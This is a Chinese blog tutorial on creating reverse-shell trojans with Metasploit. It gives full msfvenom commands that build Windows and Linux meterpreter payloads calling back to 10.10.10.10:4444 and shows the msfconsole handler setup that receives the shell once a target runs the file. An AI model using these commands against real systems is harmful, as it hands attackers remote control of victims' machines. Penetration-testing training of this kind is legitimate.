2023-11-01 12:12阅读: 841评论: 0推荐: 0

Metasploit使用教程-(反弹shell)

Metasploit 反弹 shell 

利用msfvenom生成一个反弹shell程序 

msfvenom -l payloads可以查看所有payload

Windows 通用反向 shell:

windows/meterpreter/reverse  --基于 TCP 的反向链接反弹 shell,使用起来很稳定。

windows/meterpreter/reverse_http  --基于 http 方式的反向连接,在网速慢的情况下不稳定

windows/meterpreter/reverse_https  --基于 https 方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成 443 试试。

windows/meterpreter/bind_tcp  --这是一个基于TCP的正向连接 shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置 LHOST。

生成 window 木马命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=4444 -f exe -o D:\Test\tmp\hacker.exe

Linux 通用反向 shell:

linux/x86/meterpreter/reverse_tcp

linux/x86/shell_reverse_tcp

生成 linux 木马命令

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o /tmp/client_x64.bin

打开msfconsole创建侦察监听(根据上一步生成的木马类型选择payload)

msfconsole

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.10.10.10
lhost => 10.10.10.10
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 10.10.10.10:4444

目标用户运行hacker.exe,本地可成功连接。

 

本文作者:少年阿丁

本文链接:https://www.cnblogs.com/snad/p/17802793.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   少年阿丁  阅读(841)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示
💬
评论
📌
收藏
💗
关注
👍
推荐
🚀
回顶
收起
  1. 1 404 not found REOL
404 not found - REOL
00:00 / 00:00
An audio error has occurred.